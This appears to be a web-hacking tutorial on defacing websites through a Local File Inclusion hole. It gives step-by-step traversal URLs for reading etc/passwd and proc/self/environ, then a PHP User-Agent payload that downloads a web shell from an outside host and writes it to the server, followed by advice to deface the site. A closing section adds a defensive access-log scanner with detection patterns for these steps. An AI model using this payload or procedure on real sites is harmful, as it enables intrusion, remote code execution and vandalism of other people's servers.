LFI
LFI stands for "Local File Inclusion". It is a type of web-application security vulnerability, and only one of many. Web applications are applications (in other words: pages/websites) you can view and interact with in your web browser. In this tutorial I will show you how to deface a website using an LFI vulnerability.
First of all, you need two things:
1. Firefox
2. The TamperData add-on for Firefox
LFI allows you to include a local file (which means that the file is stored on the server) and run it in a web script.
In this tutorial we are going to upload a shell by accessing proc/self/environ.
1. We have our page:
http://www.mywebsite.com/index.php?include=register.php
2. Now we are going to do this:
http://www.mywebsite.com/index.php?include=../
3. If it gives you an error message, this is good. The best thing that can happen is that it says "No such file or directory". Either way, now add this to your URL:
http://www.mywebsite.com/index.php?include=../etc/passwd
4. As long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
http://www.mywebsite.com/index.php?include=../etc/passwd
http://www.mywebsite.com/index.php?include=../../etc/passwd
http://www.mywebsite.com/index.php?include=../../../etc/passwd
5. And so on. Now let's say we got to this URL:
http://www.mywebsite.com/index.php?include=../../../etc/passwd
6. We see some huge shitty text we cannot do anything with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.mywebsite.com/index.php?include=../../../proc/self/environ
7. If you see some text, you did good; if you see an error message, you did bad. Now this is the point where we use Tamper Data. Start Tamper Data and reload the page, and for the user agent you type in the following PHP code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is part of the proc/self/environ text that the page includes, and if you put a web script in the user agent, the include will execute it.
8. Now simply access your shell by going to:
http://www.mywebsite.com/shell.php
9. Upload your deface page to the server or do whatever you want.
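From the defender's side, each step above leaves a trace in the web server's access log: "../" sequences in the include parameter, requests for etc/passwd and proc/self/environ, and a PHP tag in the User-Agent. The detection sketch below is an added example, not part of the original tutorial; it assumes the Apache/nginx combined log format, and the sample log lines, IP addresses and finding names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed combined log format:
# ip - - [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")  # a ".." path segment
SENSITIVE = ("etc/passwd", "proc/self/environ")   # files named in the tutorial
PHP_TAG_RE = re.compile(r"<\?")                   # PHP open tag inside a header

# Constructed sample lines (documentation IP range, placeholder User-Agent).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?include=register.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?include=../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?include=..%252f..%252f..%252fproc%252fself%252fenviron HTTP/1.1" 200 900 "-" "<?php /* constructed placeholder */ ?>"',
]


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded '../' is still visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def findings(line):
    """Return the sorted finding names for one access-log line."""
    match = LOG_RE.match(line)
    if not match:
        return ["unparsed"]
    hits = set()
    query = urlsplit(match["target"]).query
    for _name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode(raw).replace("\\", "/").lower()
        if TRAVERSAL_RE.search(value):
            hits.add("path-traversal")
        if any(name in value for name in SENSITIVE):
            hits.add("sensitive-file")
    if PHP_TAG_RE.search(match["ua"]):
        hits.add("php-in-user-agent")
    return sorted(hits)


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(findings(entry), entry[:70])
```

A line that combines all three findings with a 200 status is the one to escalate first, since it matches the sequence the tutorial ends on.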